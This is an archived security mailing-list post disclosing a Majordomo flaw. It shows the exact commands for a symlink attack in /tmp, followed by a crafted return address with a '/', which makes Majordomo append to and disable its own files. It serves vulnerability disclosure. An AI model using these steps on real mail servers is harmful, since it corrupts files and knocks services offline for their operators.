Majordomo /tmp exploit

• Previous message: Nigel Reed (Non-HP): "Re: Trivial mSQL/MySQL DoS method?"
• Next in thread: Steven Pritchard: "Re: Majordomo /tmp exploit"
• Reply: Steven Pritchard: "Re: Majordomo /tmp exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-=desc=-
Majordomo allows appending to any file owned by the majordomo user/group.

-=x-ploit=-
create a symlink in /tmp to any majordomo file
ex: ln -s /usr/lib/majordomo/majordomo /tmp/majordomo.debug

send a message with any emailer to majordomo with a "/" in the return
address. (i tested with Winbloze Internet Mail)
ex: blah/1234at_private

the owner of majordomo will receive the below message... from then on,
majordomo will be inoperable.  (if the above symlink is used) Majordomo
keeps a debug log and appends to it every time it crashes with out
checking ownerships of the symlinks.. or for that matter for symlinks at
all.

--snip--
Subject: MAJORDOMO ABORT (mj_majordomo)

--


MAJORDOMO ABORT (mj_majordomo)!!

HOSTILE ADDRESS (no x400 c=) blah/34234at_private
--snip--

-=fix=-
should the wrapper not check for such things?


party on.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Karl Grindley
  ICQ: 2660211
  Network Administrator
  TQG Internet Network

• Next message: SGI Security Coordinator: "Netscape Navigator Security Vulnerabilities"
• Previous message: Nigel Reed (Non-HP): "Re: Trivial mSQL/MySQL DoS method?"
• Next in thread: Steven Pritchard: "Re: Majordomo /tmp exploit"
• Reply: Steven Pritchard: "Re: Majordomo /tmp exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:47:09 PDT